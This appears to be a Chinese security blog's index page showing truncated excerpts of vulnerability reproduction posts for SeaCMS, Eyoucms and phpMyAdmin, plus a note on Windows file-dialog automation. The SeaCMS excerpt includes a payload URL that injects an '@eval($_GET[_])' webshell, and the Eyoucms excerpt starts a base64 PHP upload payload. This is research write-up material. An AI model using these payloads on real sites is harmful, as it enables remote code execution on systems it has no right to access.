in 分享

复现环境php5.6Seacms V9.92前台Getshell/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_]);?%3E /data/mysqli_error_trace.php?_=phpinf...

in 分享

复现环境php5.6Eyoucms 1.0复现过程利用地址:http://192.168.2.1/index.php/api/Uploadify/preview先将 <?php phpinfo(); base64编码payload:data:image/php;base64,PD9waH...

in 分享

由于转换功能中出错,攻击者可以利用 phpMyAdmin 在 4.8.4 之前泄漏本地文件的内容。攻击者必须有权访问 phpMyAdmin 配置存储表,尽管这些表可以很容易地在攻击者有权访问的任何数据库中创建。攻击者必须具有有效的凭据才能登录到 phpMyAdmin;但是,攻击者必须拥有有效的...

in 分享

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响版本phpMyAdmin 4.8.0/4.8.1复现环境phpstudyphpMyAdmin4.8.1复现过程session文...

in 笔记

当富文本编辑器调用系统对话框选择文件上传,你是不是一脸懵逼呢?工具Python3.xWinSpy解决办法既然调用的是系统对话框,所以我们可以试试 Windows API,使用winspy可以帮助我们快速的找到相关句柄。图片请结合代码查看import win32gui import win32c...